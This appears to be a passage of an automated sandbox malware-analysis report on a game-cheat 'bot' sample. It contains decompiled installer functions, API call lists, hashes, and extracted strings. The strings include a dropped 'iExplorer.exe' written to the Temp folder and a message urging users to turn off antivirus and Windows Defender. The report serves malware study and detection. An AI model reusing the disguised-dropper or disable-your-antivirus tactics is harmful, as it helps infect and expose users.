                                                                      			E00405530(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054C8(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                      0x00405539
                                                                      0x00405540
                                                                      0x00405543
                                                                      0x00405548
                                                                      0x0040555b
                                                                      0x00405575
                                                                      0x00000000
                                                                      0x00405575
                                                                      0x0040555f
                                                                      0x00405560
                                                                      0x00405563
                                                                      0x00405564
                                                                      0x0040556c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040556e
                                                                      0x00405571
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405571
                                                                      0x00000000
                                                                      0x00405551
                                                                      0x00000000
                                                                      0x00405552

                                                                      APIs
                                                                      • CharNextA.USER32(004052F0,C:\Users\user\AppData\Local\Temp\,0042B890,?,00405594,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040553E
                                                                      • CharNextA.USER32(00000000), ref: 00405543
                                                                      • CharNextA.USER32(00000000), ref: 00405552
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405538
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3213498283-3916508600
                                                                      • Opcode ID: 7391a88ae4d5829a42295bd6cd1696add51b0fc6b7a0626c0e887fc462c5307d
                                                                      • Instruction ID: 4bc5ae5270445c97bcf9d4c9e03ad6414130e553a4a2ecd39a2bde3a0734af95
                                                                      • Opcode Fuzzy Hash: 7391a88ae4d5829a42295bd6cd1696add51b0fc6b7a0626c0e887fc462c5307d
                                                                      • Instruction Fuzzy Hash: 44F02761D00F6936E73262682C44F7B5B9DDB55350F040437E200B61D492BC4C828FAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401D88, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 61%
                                                                      			E00401D88() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40afec->lfHeight =  ~(MulDiv(E00402A80(2), _t6, 0x48));
				 *0x40affc = E00402A80(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40b003 = 1;
				 *0x40b000 = _t11 & 0x00000001;
				 *0x40b001 = _t11 & 0x00000002;
				 *0x40b002 = _t11 & 0x00000004;
				E004059C6(_t18, _t24, _t26, 0x40b008,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40afec);
				_push(_t14);
				_push(_t26);
				E00405902();
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                      0x00401d96
                                                                      0x00401daf
                                                                      0x00401db9
                                                                      0x00401dbe
                                                                      0x00401dc9
                                                                      0x00401dd0
                                                                      0x00401de2
                                                                      0x00401de8
                                                                      0x00401ded
                                                                      0x00401df7
                                                                      0x00402533
                                                                      0x00401581
                                                                      0x004028da
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D8F
                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00401D96
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DA5
                                                                      • CreateFontIndirectA.GDI32(0040AFEC), ref: 00401DF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirect
                                                                      • String ID:
                                                                      • API String ID: 3272661963-0
                                                                      • Opcode ID: 426d0b1f7582ab83bc94716b84423147bbd52752709028eb5df2f6662aafffed
                                                                      • Instruction ID: 04b2cf0bb689a8d3b2a2f4ce8554febbdf72cd111feb48da76785613fd2833d3
                                                                      • Opcode Fuzzy Hash: 426d0b1f7582ab83bc94716b84423147bbd52752709028eb5df2f6662aafffed
                                                                      • Instruction Fuzzy Hash: 47F0AFB0958741AFE7019770AE0AB9B3F64E715309F008479F242BA1E2C7B900058FAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404CB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404CB9(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a470 != _t22) {
							 *0x42a470 = _t22;
							E004059A4(0x42a488, 0x430000);
							E00405902(0x430000, _t22);
							E00401410(6);
							E004059A4(0x430000, 0x42a488);
						}
						L11:
						return CallWindowProcA( *0x42a478, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404638(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403DFB(0x413);
				return 0;
			}




                                                                      0x00404cc5
                                                                      0x00404cea
                                                                      0x00404d0a
                                                                      0x00404d0d
                                                                      0x00404d10
                                                                      0x00404d27
                                                                      0x00404d2d
                                                                      0x00404d34
                                                                      0x00404d3b
                                                                      0x00404d42
                                                                      0x00404d47
                                                                      0x00404d4d
                                                                      0x00000000
                                                                      0x00404d5d
                                                                      0x00404cf7
                                                                      0x00404d4a
                                                                      0x00404d4a
                                                                      0x00000000
                                                                      0x00404d4a
                                                                      0x00404d03
                                                                      0x00404d05
                                                                      0x00000000
                                                                      0x00404d05
                                                                      0x00404ccb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404cd2
                                                                      0x00000000

                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404CEF
                                                                      • CallWindowProcA.USER32 ref: 00404D5D
                                                                        • Part of subcall function 00403DFB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: b5a6871f53b9aff14b78b0a402df012a51bafca8f90a4562a882f6af99847d63
                                                                      • Instruction ID: 50f0fb6b168824e55620476c7b8c1a6d0acc7f89a76eb432e7383bd4e3edd017
                                                                      • Opcode Fuzzy Hash: b5a6871f53b9aff14b78b0a402df012a51bafca8f90a4562a882f6af99847d63
                                                                      • Instruction Fuzzy Hash: B5118271500208EFDF216F51DC45A9B3629AF94369F00803BFA047A1D1C3BD89629B6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402539, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402539(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9D(0x11));
				} else {
					E00402A80(1);
					 *0x409fe8 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E0040591B(_t17 + 8, _t15), " C:\Users\hardz\AppData\Local\Temp\iExplorer.exe", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                      0x00402539
                                                                      0x00402539
                                                                      0x0040253c
                                                                      0x00402557
                                                                      0x0040253e
                                                                      0x00402540
                                                                      0x00402545
                                                                      0x0040254c
                                                                      0x0040255e
                                                                      0x004026d7
                                                                      0x004026d7
                                                                      0x00402564
                                                                      0x00402576
                                                                      0x004015c8
                                                                      0x004015ca
                                                                      0x00000000
                                                                      0x004015d0
                                                                      0x004015ca
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 00402557
                                                                      • WriteFile.KERNEL32(00000000,?, C:\Users\user\AppData\Local\Temp\iExplorer.exe,00000000,?,?,00000000,00000011), ref: 00402576
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FileWritelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                      • API String ID: 427699356-411568985
                                                                      • Opcode ID: 129f4101278f230a12e3b7b304108a9dcc6e5d2d001034f4fe4167e8a906c2aa
                                                                      • Instruction ID: 7e9b30a943740ca1d9d75b10bf5a8e3275fb52bd6939b3579fcd9685c4e40542
                                                                      • Opcode Fuzzy Hash: 129f4101278f230a12e3b7b304108a9dcc6e5d2d001034f4fe4167e8a906c2aa
                                                                      • Instruction Fuzzy Hash: 67F0E971A04242FFD700FBA59E49EAF76A48B00304F10043BB241F50C2C5FC4A458B6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004054E4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004054E4(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                                                      0x004054e5
                                                                      0x004054ef
                                                                      0x004054f1
                                                                      0x004054f8
                                                                      0x00405500
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405500
                                                                      0x00405502
                                                                      0x00405506

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9B,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 004054EA
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9B,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5), ref: 004054F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1669384263
                                                                      • Opcode ID: 3c0d1a3bf7508682bebb89c4b52116236a06921ad673057ba2d2d542b10fa704
                                                                      • Instruction ID: be4cd192eb94556ab0fd8e7e6f7cb58a2315bfdb3d9c16d790827d1793bfce43
                                                                      • Opcode Fuzzy Hash: 3c0d1a3bf7508682bebb89c4b52116236a06921ad673057ba2d2d542b10fa704
                                                                      • Instruction Fuzzy Hash: 5FD0A7A3409D706AF3131214CC04B9F7A498F16300F094462F140A61D1C2781D818FAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004055F5, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004055F5(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                      0x00405601
                                                                      0x00405603
                                                                      0x0040562b
                                                                      0x00405610
                                                                      0x00405615
                                                                      0x00405620
                                                                      0x00000000
                                                                      0x0040563d
                                                                      0x00405629
                                                                      0x00405629
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 004055FC
                                                                      • lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 00405615
                                                                      • CharNextA.USER32(?), ref: 00405623
                                                                      • lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 0040562C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d56a3fc7bb82f956f3a73290afb8f08812f40ea20b7eee9fc8f43816ba82b717
                                                                      • Instruction ID: afc3c169ec71fe51d0bbfcf79615922950c410aa52d851159d391602867c6ff0
                                                                      • Opcode Fuzzy Hash: d56a3fc7bb82f956f3a73290afb8f08812f40ea20b7eee9fc8f43816ba82b717
                                                                      • Instruction Fuzzy Hash: 89F0A736209D51DAD3125B255D04E6F6B95EF91354F64087AF044F2280D33698169BBB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: MULTIBOT_NEWW.exe PID: 4768 Parent PID: 2432 MULTIBOT_NEWW.exeCOMMON

                                                                      Executed Functions

                                                                      Function 0040114C, Relevance: 1.7, APIs: 1, Instructions: 244COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.489130854.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.489103608.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000003.00000002.489293811.0000000000418000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000003.00000002.489318917.0000000000419000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: #100
                                                                      • String ID:
                                                                      • API String ID: 1341478452-0
                                                                      • Opcode ID: 8e32c3df4a1d41e72366ed0a120761df4992f68703580c4cd9f94e6a82f34356
                                                                      • Instruction ID: a8a150b918f45f9d09cd08f32c0c265bffeeb3950bd1910e736fea6d78b8c839
                                                                      • Opcode Fuzzy Hash: 8e32c3df4a1d41e72366ed0a120761df4992f68703580c4cd9f94e6a82f34356
                                                                      • Instruction Fuzzy Hash: 9491DA6104E3C28FD7538BB49CA52917FB0AE03224B1E85EBC4C0DF0B3D26D584ADB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00416BA0, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 163COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416C3D
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416C55
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416C98
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416CB0
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416CF3
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416D0B
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416D4E
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416D66
                                                                      Strings
                                                                      • CLOSE PLEASE TRUN OFF ANTIVIRUS AND WINDOWS DEFENDER, xrefs: 00416C1B
                                                                      • contact VIP WA (08977743346), xrefs: 00416D2C
                                                                      • Cheat Actived, xrefs: 00416C76
                                                                      • www.Atlantica-bot.net, xrefs: 00416CD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.489130854.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.489103608.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000003.00000002.489293811.0000000000418000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000003.00000002.489318917.0000000000419000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: #595FreeList__vba
                                                                      • String ID: CLOSE PLEASE TRUN OFF ANTIVIRUS AND WINDOWS DEFENDER$Cheat Actived$contact VIP WA (08977743346)$www.Atlantica-bot.net
                                                                      • API String ID: 3346922759-2653881717
                                                                      • Opcode ID: 2d9dd83fd7ef1c06943b5a54ebbfc68aad30056d9339d083e06d6b82f5b48f93
                                                                      • Instruction ID: fcd23605c29fe40837c11b06961aa58660b7c4ac389b54f33bd5c8f158c4a734
                                                                      • Opcode Fuzzy Hash: 2d9dd83fd7ef1c06943b5a54ebbfc68aad30056d9339d083e06d6b82f5b48f93
                                                                      • Instruction Fuzzy Hash: 0261A5B1D01249AFCB04CFD9DA84ADDBBF9EF48704F20851AE106BA154E7B46B09CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: svchost.exe PID: 4280 Parent PID: 2432 svchost.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00007FFAEE5E3DDC, Relevance: 9.8, Instructions: 9778COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1581294901cc86c51f54e85ff2baf3533717f8912874b5b3dd6978a31d6e1ee6
                                                                      • Instruction ID: 8ba2d719f07c356e881faaca5606ffdb29de84db002ba53d79597917fe6fc985
                                                                      • Opcode Fuzzy Hash: 1581294901cc86c51f54e85ff2baf3533717f8912874b5b3dd6978a31d6e1ee6
                                                                      • Instruction Fuzzy Hash: 88E30260A0D7894FEB97E73885A472C2BE29F5F240B5640F7C45DCB2E7DC686C498722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E017F, Relevance: 11.7, Strings: 9, Instructions: 470COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P4J$T4J$X4J$\4J$`4J$d4J$h4J$t4J$x4J
                                                                      • API String ID: 0-2262923296
                                                                      • Opcode ID: eb3d20f0ecbc942c5c2a5d7224baf7d09c7445197ab326602f1fb299dc492d3b
                                                                      • Instruction ID: 75c716f3ad4946d92d159b68fd41bccac5ea54474b1d773307c6b492e45e374a
                                                                      • Opcode Fuzzy Hash: eb3d20f0ecbc942c5c2a5d7224baf7d09c7445197ab326602f1fb299dc492d3b
                                                                      • Instruction Fuzzy Hash: 04E1A5A1A0DBC94FE787E77848617647FF1AF5B250B5A41EBD08CCB1E7E8185C498322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E0F87, Relevance: 4.3, Strings: 3, Instructions: 504COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P4J$P4J$T4J
                                                                      • API String ID: 0-1713122075
                                                                      • Opcode ID: e3296d075810168a2501e212f07bb920289f6e2033830ee386fbf5389b01616d
                                                                      • Instruction ID: 060587b8e6cbdadadc67c1e79c656b77f54c450aa5e0c19fe69147f36b2aef7a
                                                                      • Opcode Fuzzy Hash: e3296d075810168a2501e212f07bb920289f6e2033830ee386fbf5389b01616d
                                                                      • Instruction Fuzzy Hash: A2F1D2B0A0868A4FEB85AF7885A97BD3BC1EF5A340F554079E40DC72D3EE7C98458742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E27BD, Relevance: 4.2, Strings: 3, Instructions: 441COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X4J$\4J$`4J
                                                                      • API String ID: 0-4271243753
                                                                      • Opcode ID: c4ac68da30fd81c0d94e959743b3c097cf19335438d44d7386c1df7e430546a8
                                                                      • Instruction ID: 8582dfc3a1fbd08e479e3935c3a9dc927a2f37e07e40e0f13da0c24bc7a1b3f3
                                                                      • Opcode Fuzzy Hash: c4ac68da30fd81c0d94e959743b3c097cf19335438d44d7386c1df7e430546a8
                                                                      • Instruction Fuzzy Hash: 38E183A0A0D7894FEB46DB7488607A93FE1AF5B344F5501E6D48DCB2D7DA6C5C48C322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2895, Relevance: 2.9, Strings: 2, Instructions: 361COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \4J$`4J
                                                                      • API String ID: 0-1148600527
                                                                      • Opcode ID: 1619f1dcdef2fd81f6d07c13e15ce5e7076cfe96a36cab4cd674be8caf7ec848
                                                                      • Instruction ID: f57f470b01f471f0f4fecbcaf00a7a736159858b7bbdc1d7474d0c4a527d4271
                                                                      • Opcode Fuzzy Hash: 1619f1dcdef2fd81f6d07c13e15ce5e7076cfe96a36cab4cd674be8caf7ec848
                                                                      • Instruction Fuzzy Hash: EAC143A0A1D78D4FEB46EB7484607687BE1AF5B344F5501E6D08DCB2D7DE6C5C488322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E3779, Relevance: 2.9, Strings: 2, Instructions: 356COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (d[L$d4J
                                                                      • API String ID: 0-2102226810
                                                                      • Opcode ID: d3d5aa5202b8614c0947afb4807e7a8db74ca8b39f4579b97efb39c2057183cb
                                                                      • Instruction ID: 64e62c701c5fa6a988f9e71230167236d54969e522c94a64f3c94a1f09c174e0
                                                                      • Opcode Fuzzy Hash: d3d5aa5202b8614c0947afb4807e7a8db74ca8b39f4579b97efb39c2057183cb
                                                                      • Instruction Fuzzy Hash: FDC1C3A1A1CA894FEB45EF28C4957A83BD1FF4A300F5540BAE44DC72D3DE78A845C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E28C7, Relevance: 2.8, Strings: 2, Instructions: 344COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \4J$`4J
                                                                      • API String ID: 0-1148600527
                                                                      • Opcode ID: 4346b10be2916943195101794f1942705e2f2aea3903e1851f3dea32e16a7446
                                                                      • Instruction ID: 91fe2008cc675500fb49bff6825e9e201d6703748dd17f99a12adeca60303f34
                                                                      • Opcode Fuzzy Hash: 4346b10be2916943195101794f1942705e2f2aea3903e1851f3dea32e16a7446
                                                                      • Instruction Fuzzy Hash: 41C141A0A1D78D4FEB46EB7484607683BE1AF5B344F9501EAD08DCB2D7DE685C448322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E35DD, Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &$
                                                                      • API String ID: 0-3672554430
                                                                      • Opcode ID: 7d3c703847a831042b1a4d17d281321ade641e81596d2652a6dc8787ba601ab9
                                                                      • Instruction ID: e57e422eb7b04470cb8730b0ef0f5b58e1c1004816874025a5fecb399fab2b5d
                                                                      • Opcode Fuzzy Hash: 7d3c703847a831042b1a4d17d281321ade641e81596d2652a6dc8787ba601ab9
                                                                      • Instruction Fuzzy Hash: E751A371A1C7884FE745EB78C496779BBE1EF5A300F5400BEE489C7293DE689C458742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFAEE5E2935, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                      Download Yara Rule
